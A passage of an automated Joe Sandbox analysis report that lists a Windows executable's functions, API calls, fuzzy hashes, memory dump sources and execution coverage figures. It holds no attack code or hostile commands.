                                                                                    • Instruction ID: eec721f06f1dd6a54d9e524834f1e9bb5871a12db14cbfb8629f86163a5f8cbc
                                                                                    • Opcode Fuzzy Hash: cce129f31006e27da8112d56d0a1eda3a571ded943039947c7734ebb97adca33
                                                                                    • Instruction Fuzzy Hash: 5D41B7719006669BDB219F688C559DE7BB8EF14310F000059F9C9F7289DB34ED598BE0
                                                                                    APIs
                                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,010291E0,?,00000000,?,00000001,?,?,00000001,010291E0,?), ref: 0102C9D5
                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0102CA5E
                                                                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,01026CBE,?), ref: 0102CA70
                                                                                    • __freea.LIBCMT ref: 0102CA79
                                                                                      • Part of subcall function 01028E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0102CA2C,00000000,?,01026CBE,?,00000008,?,010291E0,?,?,?), ref: 01028E38
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                    • String ID:
                                                                                    • API String ID: 2652629310-0
                                                                                    • Opcode ID: 56d0f153d39c0cb905f29f7f6a6b761015d4236384a408c17edb643204b09080
                                                                                    • Instruction ID: ed2d6f2d6174f20c8c28b3809acced4443dd2bf137096f88a7eb9ee66b5ae090
                                                                                    • Opcode Fuzzy Hash: 56d0f153d39c0cb905f29f7f6a6b761015d4236384a408c17edb643204b09080
                                                                                    • Instruction Fuzzy Hash: 5131C172A0022AABEF25CF68DC85DFE7BA5EF41714B0442A8EC84E7250E735DD54CB90
                                                                                    APIs
                                                                                    • GetDC.USER32(00000000), ref: 0101A666
                                                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 0101A675
                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0101A683
                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 0101A691
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: CapsDevice$Release
                                                                                    • String ID:
                                                                                    • API String ID: 1035833867-0
                                                                                    • Opcode ID: 45aa8b72bd48f80fb49a7a90c306cf52de2bd15b1b30a36fb3ee21c4f5a42c14
                                                                                    • Instruction ID: 579ba39f9111fb4198bb62cc15749197ef82f3556b60e6f15499c4ba8277be48
                                                                                    • Opcode Fuzzy Hash: 45aa8b72bd48f80fb49a7a90c306cf52de2bd15b1b30a36fb3ee21c4f5a42c14
                                                                                    • Instruction Fuzzy Hash: A7E08C31A42720FBE2701BA0A91DB8B3E94BB05B52F004505FF899A188DB7E80088BE0
                                                                                    APIs
                                                                                      • Part of subcall function 0101A699: GetDC.USER32(00000000), ref: 0101A69D
                                                                                      • Part of subcall function 0101A699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 0101A6A8
                                                                                      • Part of subcall function 0101A699: ReleaseDC.USER32(00000000,00000000), ref: 0101A6B3
                                                                                    • GetObjectW.GDI32(?,00000018,?), ref: 0101A83C
                                                                                      • Part of subcall function 0101AAC9: GetDC.USER32(00000000), ref: 0101AAD2
                                                                                      • Part of subcall function 0101AAC9: GetObjectW.GDI32(?,00000018,?), ref: 0101AB01
                                                                                      • Part of subcall function 0101AAC9: ReleaseDC.USER32(00000000,?), ref: 0101AB99
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: ObjectRelease$CapsDevice
                                                                                    • String ID: (
                                                                                    • API String ID: 1061551593-3887548279
                                                                                    • Opcode ID: 1f69a9f1103e0cd4ab5dd2d00f1819c5b0c22e4572efacf221fc78cb962b5a18
                                                                                    • Instruction ID: dc3842d6006a8fa5fabe1f3ddbb26c5507f551926b0bdd9edbcccf53d03fea8b
                                                                                    • Opcode Fuzzy Hash: 1f69a9f1103e0cd4ab5dd2d00f1819c5b0c22e4572efacf221fc78cb962b5a18
                                                                                    • Instruction Fuzzy Hash: A191F371604380EFD720DF25C884A2BBBE8FFC9611F00495EF99AD7225DB35A845CB62
                                                                                    APIs
                                                                                    • _free.LIBCMT ref: 0102B324
                                                                                      • Part of subcall function 01029097: IsProcessorFeaturePresent.KERNEL32(00000017,01029086,00000050,01033A34,?,0100D710,00000004,01041030,?,?,01029093,00000000,00000000,00000000,00000000,00000000), ref: 01029099
                                                                                      • Part of subcall function 01029097: GetCurrentProcess.KERNEL32(C0000417,01033A34,00000050,01041030), ref: 010290BB
                                                                                      • Part of subcall function 01029097: TerminateProcess.KERNEL32(00000000), ref: 010290C2
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                                    • String ID: *?$.
                                                                                    • API String ID: 2667617558-3972193922
                                                                                    • Opcode ID: 24177f1303fc0c2b907af2c7b7eb43e02322faf7c38b9a999d5b9cde15d1856f
                                                                                    • Instruction ID: 404f55a7778ee7622342f99f5da2bd885d2ed220bac62a7c44004ab7a9eb5aa1
                                                                                    • Opcode Fuzzy Hash: 24177f1303fc0c2b907af2c7b7eb43e02322faf7c38b9a999d5b9cde15d1856f
                                                                                    • Instruction Fuzzy Hash: ED519471E0022A9FDF15DFA8C880AEDBBF5FF59314F2481A9D894E7341E6359A05CB50
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 010075E3
                                                                                      • Part of subcall function 010105DA: _wcslen.LIBCMT ref: 010105E0
                                                                                      • Part of subcall function 0100A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0100A598
                                                                                    • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0100777F
                                                                                      • Part of subcall function 0100A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0100A325,?,?,?,0100A175,?,00000001,00000000,?,?), ref: 0100A501
                                                                                      • Part of subcall function 0100A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0100A325,?,?,?,0100A175,?,00000001,00000000,?,?), ref: 0100A532
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$Attributes$CloseFindH_prologTime_wcslen
                                                                                    • String ID: :
                                                                                    • API String ID: 3226429890-336475711
                                                                                    • Opcode ID: 4fea321dbf4fb7375c9c09ef5a9cec7d3b33f215167b03e3376380eb442f8ee7
                                                                                    • Instruction ID: b11a4c151c29fc10881f168db68412f4009bbab564832e87430acea193625797
                                                                                    • Opcode Fuzzy Hash: 4fea321dbf4fb7375c9c09ef5a9cec7d3b33f215167b03e3376380eb442f8ee7
                                                                                    • Instruction Fuzzy Hash: 74417171900259A9FB36EB64CC58EEEB77CAF55300F0040D6A6CAA70D2DB785B85CB71
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcslen
                                                                                    • String ID: }
                                                                                    • API String ID: 176396367-4239843852
                                                                                    • Opcode ID: 936d77c377cc58b1bea087efe988a2fe98ba6f7a71d594fa6bd6df2701d6a35c
                                                                                    • Instruction ID: 528b68e383d7d2e985ceb3394e070aaf384fcab9c4249081fc2a5a519314684d
                                                                                    • Opcode Fuzzy Hash: 936d77c377cc58b1bea087efe988a2fe98ba6f7a71d594fa6bd6df2701d6a35c
                                                                                    • Instruction Fuzzy Hash: 3221C67290431A5ADB32DB68D844FABB3FCEF95750F04046AE6C0C7145EB6DD94883A2
                                                                                    APIs
                                                                                      • Part of subcall function 0100F2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0100F2E4
                                                                                      • Part of subcall function 0100F2C5: GetProcAddress.KERNEL32(010481C8,CryptUnprotectMemory), ref: 0100F2F4
                                                                                    • GetCurrentProcessId.KERNEL32(?,?,?,0100F33E), ref: 0100F3D2
                                                                                    Strings
                                                                                    • CryptProtectMemory failed, xrefs: 0100F389
                                                                                    • CryptUnprotectMemory failed, xrefs: 0100F3CA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressProc$CurrentProcess
                                                                                    • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                                                    • API String ID: 2190909847-396321323
                                                                                    • Opcode ID: 009ee6bf3ed401f1bfecaae41a644a3f8b752ee455c99ac1d05672a3976549e1
                                                                                    • Instruction ID: 88968022f55c8b13e60e87dd97a202f24e5968efcf44f9cbcf7f2f7151350bc2
                                                                                    • Opcode Fuzzy Hash: 009ee6bf3ed401f1bfecaae41a644a3f8b752ee455c99ac1d05672a3976549e1
                                                                                    • Instruction Fuzzy Hash: C5110631A0062B6BFB33AB24D881A6E3B98FF00670F04C157FCC15F2D5DA75A9419791
                                                                                    APIs
                                                                                    • _swprintf.LIBCMT ref: 0100B9B8
                                                                                      • Part of subcall function 01004092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 010040A5
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vswprintf_c_l_swprintf
                                                                                    • String ID: %c:\
                                                                                    • API String ID: 1543624204-3142399695
                                                                                    • Opcode ID: 72ce45eff15f3600f4345f462fee55527617bec1800ae13176782f19b889a33e
                                                                                    • Instruction ID: db617449798f4af6a5e0494c7b9b00353db38c05a3b0950266c7a506ce3bb9a3
                                                                                    • Opcode Fuzzy Hash: 72ce45eff15f3600f4345f462fee55527617bec1800ae13176782f19b889a33e
                                                                                    • Instruction Fuzzy Hash: 9201F56750032379FA72AB7D8C84DABB7ECEE96670F40491BF5C4D60C1EA34D48482B1
                                                                                    APIs
                                                                                    • CreateThread.KERNEL32(00000000,00010000,01011160,?,00000000,00000000), ref: 01011043
                                                                                    • SetThreadPriority.KERNEL32(?,00000000), ref: 0101108A
                                                                                      • Part of subcall function 01006C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 01006C54
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: Thread$CreatePriority__vswprintf_c_l
                                                                                    • String ID: CreateThread failed
                                                                                    • API String ID: 2655393344-3849766595
                                                                                    • Opcode ID: ae85d343ab2057327c7bbb679deabad2b66b98f40ec746ea108c98583d145588
                                                                                    • Instruction ID: 206cfdbbd0883072cb6439eb0a098a7f4a1882cda37c427025e3a8e6eed6be5e
                                                                                    • Opcode Fuzzy Hash: ae85d343ab2057327c7bbb679deabad2b66b98f40ec746ea108c98583d145588
                                                                                    • Instruction Fuzzy Hash: 3201A7F574430A6BE2355E749C91BB6B399EB40651F10002EF6C65A285CAF668848624
                                                                                    APIs
                                                                                      • Part of subcall function 010297E5: GetLastError.KERNEL32(?,01041030,01024674,01041030,?,?,01023F73,00000050,?,01041030,00000200), ref: 010297E9
                                                                                      • Part of subcall function 010297E5: _free.LIBCMT ref: 0102981C
                                                                                      • Part of subcall function 010297E5: SetLastError.KERNEL32(00000000,?,01041030,00000200), ref: 0102985D
                                                                                      • Part of subcall function 010297E5: _abort.LIBCMT ref: 01029863
                                                                                    • _abort.LIBCMT ref: 0102BB80
                                                                                    • _free.LIBCMT ref: 0102BBB4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast_abort_free
                                                                                    • String ID: x)J
                                                                                    • API String ID: 289325740-2012010399
                                                                                    • Opcode ID: a1ffc755ec38a38d90acaee10b4a5eb1751f0588ec0b64fc87f4ca55490b4073
                                                                                    • Instruction ID: cfdb3ef9816b3d5181e17b4b8306903cbca188b95f90eeb1d4ca22e410b9bfa2
                                                                                    • Opcode Fuzzy Hash: a1ffc755ec38a38d90acaee10b4a5eb1751f0588ec0b64fc87f4ca55490b4073
                                                                                    • Instruction Fuzzy Hash: BE01D635D00637DBCB72AF6CC40025DBBE5BF14721B15028AE9E467249CBB96901CFC0
                                                                                    APIs
                                                                                      • Part of subcall function 0100E2E8: _swprintf.LIBCMT ref: 0100E30E
                                                                                      • Part of subcall function 0100E2E8: _strlen.LIBCMT ref: 0100E32F
                                                                                      • Part of subcall function 0100E2E8: SetDlgItemTextW.USER32(?,0103E274,?), ref: 0100E38F
                                                                                      • Part of subcall function 0100E2E8: GetWindowRect.USER32(?,?), ref: 0100E3C9
                                                                                      • Part of subcall function 0100E2E8: GetClientRect.USER32(?,?), ref: 0100E3D5
                                                                                    • GetDlgItem.USER32(00000000,00003021), ref: 0100135A
                                                                                    • SetWindowTextW.USER32(00000000,010335F4), ref: 01001370
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                                                    • String ID: 0
                                                                                    • API String ID: 2622349952-4108050209
                                                                                    • Opcode ID: f6b751423ced894b052c88f3860024e1f709eb490e2cb8d31f6b4898ef387fa9
                                                                                    • Instruction ID: 65b811ef1a5752bd3bbe4d2a0fe35db3247a4442338e297b6d4ecb649b1af4a4
                                                                                    • Opcode Fuzzy Hash: f6b751423ced894b052c88f3860024e1f709eb490e2cb8d31f6b4898ef387fa9
                                                                                    • Instruction Fuzzy Hash: 75F03C7010438CABFF671F64C80DAEA3FA9AB44355F048554FDC8595E1CB79C5909B50
                                                                                    APIs
                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,01011206,?), ref: 01010FEA
                                                                                    • GetLastError.KERNEL32(?), ref: 01010FF6
                                                                                      • Part of subcall function 01006C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 01006C54
                                                                                    Strings
                                                                                    • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 01010FFF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                                                    • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                                    • API String ID: 1091760877-2248577382
                                                                                    • Opcode ID: babe8eb073632b6e2df6a7a181251be46afc9b4c3b0fbdfb0cc57c3bd37f96cb
                                                                                    • Instruction ID: 51e0d02caec95f89a0b6c173f2cde64c3ea88b909fc38d0b2ed7971a485457a1
                                                                                    • Opcode Fuzzy Hash: babe8eb073632b6e2df6a7a181251be46afc9b4c3b0fbdfb0cc57c3bd37f96cb
                                                                                    • Instruction Fuzzy Hash: ECD02B71A0453537D52232349C44DBE7809DB21331F104B04F1B8592D9CA6A49514791
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,0100DA55,?), ref: 0100E2A3
                                                                                    • FindResourceW.KERNEL32(00000000,RTL,00000005,?,0100DA55,?), ref: 0100E2B1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: FindHandleModuleResource
                                                                                    • String ID: RTL
                                                                                    • API String ID: 3537982541-834975271
                                                                                    • Opcode ID: 371d609f941b6b2d0f755d35130536fca736c8c4e843f2711f909dc00b00acdb
                                                                                    • Instruction ID: 2d604e4db904fe36c96a5bc6f3f98bf81548d637e8a196ca89d90fe7ac456572
                                                                                    • Opcode Fuzzy Hash: 371d609f941b6b2d0f755d35130536fca736c8c4e843f2711f909dc00b00acdb
                                                                                    • Instruction Fuzzy Hash: 3FC0123164071066F63016656D9DB43AE5C6B00B11F05044CB2C1ED1C5D6AAC48187A0
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: CommandLine
                                                                                    • String ID: %I
                                                                                    • API String ID: 3253501508-63094095
                                                                                    • Opcode ID: 48509eac9cebe4f7a09c14e2cd7a38ee07d5092bba7341b260f7e4a9d1a53ca3
                                                                                    • Instruction ID: 87d7aa7411e08cb66201adef50c758904af4f14991487440fff62a40c918fe77
                                                                                    • Opcode Fuzzy Hash: 48509eac9cebe4f7a09c14e2cd7a38ee07d5092bba7341b260f7e4a9d1a53ca3
                                                                                    • Instruction Fuzzy Hash: 46B092B89012088FD7208F30B08C0047BB4BE4D3023805856E882CA328DB3F4489DF00

                                                                                    Execution Graph

                                                                                    Execution Coverage:5.5%
                                                                                    Dynamic/Decrypted Code Coverage:75%
                                                                                    Signature Coverage:0%
                                                                                    Total number of Nodes:12
                                                                                    Total number of Limit Nodes:0
